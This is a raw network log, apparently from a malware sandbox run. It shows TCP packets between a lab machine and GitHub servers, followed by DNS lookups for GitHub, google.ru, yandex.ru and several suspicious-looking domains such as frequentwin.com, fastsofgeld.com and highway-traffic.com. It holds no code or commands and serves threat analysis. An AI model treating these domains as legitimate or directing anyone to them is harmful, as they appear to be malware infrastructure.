                                                                                                                                                    Sep 29, 2022 14:59:13.076754093 CEST49755443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:13.076754093 CEST49755443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:13.076776981 CEST44349755185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:13.076801062 CEST49755443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:13.076824903 CEST49755443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:13.083120108 CEST44349755185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:13.083159924 CEST44349755185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:13.083199024 CEST44349755185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:13.083261013 CEST44349755185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:13.083302975 CEST49755443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:13.083303928 CEST49755443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:13.083326101 CEST44349755185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:13.083766937 CEST49755443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:13.091048002 CEST44349755185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:13.091074944 CEST44349755185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:13.092590094 CEST44349755185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:13.092619896 CEST44349755185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:13.092684984 CEST44349755185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:13.092710972 CEST49755443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:13.092753887 CEST44349755185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:13.092776060 CEST49755443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:13.092776060 CEST49755443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:13.092818022 CEST49755443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:13.092818022 CEST49755443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:13.095226049 CEST44349755185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:13.095288038 CEST44349755185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:13.095330954 CEST44349755185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:13.095401049 CEST49755443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:13.095401049 CEST49755443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:13.095402002 CEST44349755185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:13.095438004 CEST44349755185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:13.095473051 CEST44349755185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:13.095503092 CEST49755443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:13.095503092 CEST49755443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:13.095506907 CEST44349755185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:13.095561981 CEST49755443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:13.095561981 CEST49755443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:13.095576048 CEST44349755185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:13.095691919 CEST44349755185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:13.095784903 CEST49755443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:13.095798969 CEST44349755185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:13.095869064 CEST44349755185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:13.096916914 CEST49755443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:13.101452112 CEST49755443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:13.411132097 CEST49756443192.168.2.3140.82.121.3
                                                                                                                                                    Sep 29, 2022 14:59:13.411195040 CEST44349756140.82.121.3192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:13.411289930 CEST49756443192.168.2.3140.82.121.3
                                                                                                                                                    Sep 29, 2022 14:59:13.411674976 CEST49756443192.168.2.3140.82.121.3
                                                                                                                                                    Sep 29, 2022 14:59:13.411693096 CEST44349756140.82.121.3192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:13.460217953 CEST44349756140.82.121.3192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:13.470586061 CEST49756443192.168.2.3140.82.121.3
                                                                                                                                                    Sep 29, 2022 14:59:13.470649958 CEST44349756140.82.121.3192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:13.807420015 CEST44349756140.82.121.3192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:13.807518005 CEST44349756140.82.121.3192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:13.807590008 CEST44349756140.82.121.3192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:13.807696104 CEST49756443192.168.2.3140.82.121.3
                                                                                                                                                    Sep 29, 2022 14:59:13.834254026 CEST49756443192.168.2.3140.82.121.3
                                                                                                                                                    Sep 29, 2022 14:59:13.835125923 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:13.835176945 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:13.835392952 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:13.835803986 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:13.835827112 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:13.873372078 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:13.939026117 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.006103992 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.006130934 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.208319902 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.208409071 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.208451986 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.208487034 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.208488941 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.208520889 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.208540916 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.208569050 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.208600998 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.208605051 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.208617926 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.208648920 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.208880901 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.208965063 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.209006071 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.209016085 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.209516048 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.209563971 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.209573984 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.212598085 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.212622881 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.212666988 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.212686062 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.212719917 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.212737083 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.224524021 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.224556923 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.224643946 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.224677086 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.224693060 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.226845026 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.226883888 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.226939917 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.226964951 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.226982117 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.229329109 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.229351044 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.229401112 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.229425907 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.229440928 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.230603933 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.230632067 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.230664968 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.230681896 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.230698109 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.239500046 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.239542961 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.239650011 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.239686966 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.239703894 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.240387917 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.240425110 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.240447998 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.240461111 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.240509033 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.242227077 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.242263079 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.242326975 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.242341042 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.242360115 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.243156910 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.243194103 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.243232965 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.243247986 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.243275881 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.244541883 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.244570017 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.244618893 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.244632959 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.244647026 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.245419025 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.245451927 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.245486021 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.245496988 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.245512962 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.245527983 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.246449947 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.246474028 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.246521950 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.246535063 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.246547937 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.255043983 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.255111933 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.255225897 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.255287886 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.287853956 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.287888050 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.287914991 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.287935972 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.288003922 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.288033962 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.288067102 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.288105965 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.288141966 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.289295912 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.289309025 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.289413929 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.289819002 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.289827108 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.289841890 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.289904118 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.289967060 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.290647984 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.290657043 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.290756941 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.291138887 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.291146994 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.291160107 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.291215897 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.291276932 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.291995049 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.292002916 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.292131901 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.292509079 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.292515993 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.292526960 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.292582035 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.292634010 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.292665005 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.293323994 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.293332100 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.293451071 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.293852091 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.293859005 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.293870926 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.293922901 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.293987036 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.294751883 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.294760942 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.294872046 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.295200109 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.295207024 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.295217037 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.295269012 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.295317888 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.295351028 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.296098948 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.296108007 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.296216011 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.296622038 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.296628952 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.296638012 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.296684980 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.296734095 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.297379971 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.297388077 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.297502995 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.297902107 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.297909021 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.297919035 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.297962904 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.298010111 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.298043013 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.299381018 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.299390078 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.299516916 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.299999952 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.300007105 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.300018072 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.300057888 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.300081015 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.300124884 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.300959110 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.300966978 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.301073074 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.301604986 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.301611900 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.301623106 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.301656008 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.301661015 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.301692963 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.301718950 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.302615881 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.303191900 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.303713083 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.303797007 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.303809881 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.303818941 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.303853035 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.303868055 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:14.303894043 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.303911924 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:14.303947926 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                    Sep 29, 2022 14:58:47.004359007 CEST192.168.2.38.8.8.80x416Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 14:58:47.821549892 CEST192.168.2.38.8.8.80xe622Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 14:59:58.869461060 CEST192.168.2.38.8.8.80xd8fcStandard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 14:59:58.873929977 CEST192.168.2.38.8.8.80x2f38Standard query (0)yandex.ruA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:02.514602900 CEST192.168.2.38.8.8.80x62e3Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:02.632707119 CEST192.168.2.38.8.8.80x7ae3Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:02.900638103 CEST192.168.2.38.8.8.80x5c9bStandard query (0)searchdusty.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:04.341327906 CEST192.168.2.38.8.8.80xf12dStandard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:04.642347097 CEST192.168.2.38.8.8.80xcae3Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:04.799469948 CEST192.168.2.38.8.8.80xd924Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:05.009816885 CEST192.168.2.38.8.8.80x4125Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:06.106622934 CEST192.168.2.38.8.8.80xc8d9Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:07.630908966 CEST192.168.2.38.8.8.80x314bStandard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:08.480943918 CEST192.168.2.38.8.8.80xa0feStandard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:08.487189054 CEST192.168.2.38.8.8.80x77d5Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:08.595639944 CEST192.168.2.38.8.8.80x5656Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:09.338212013 CEST192.168.2.38.8.8.80x6ab4Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:10.905982018 CEST192.168.2.38.8.8.80xf81Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:11.597904921 CEST192.168.2.38.8.8.80x7767Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:13.886804104 CEST192.168.2.38.8.8.80x2fc6Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:13.956151009 CEST192.168.2.38.8.8.80x4a9Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:16.070574999 CEST192.168.2.38.8.8.80xc2d3Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:18.973599911 CEST192.168.2.38.8.8.80x7180Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:20.389364958 CEST192.168.2.38.8.8.80x3443Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:20.872392893 CEST192.168.2.38.8.8.80x3e74Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:21.414275885 CEST192.168.2.38.8.8.80x95d4Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:22.594518900 CEST192.168.2.38.8.8.80xdeddStandard query (0)www.vikingwebscanner.comA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:00:23.900516033 CEST192.168.2.38.8.8.80xa541Standard query (0)google.ruA (IP address)IN (0x0001)false
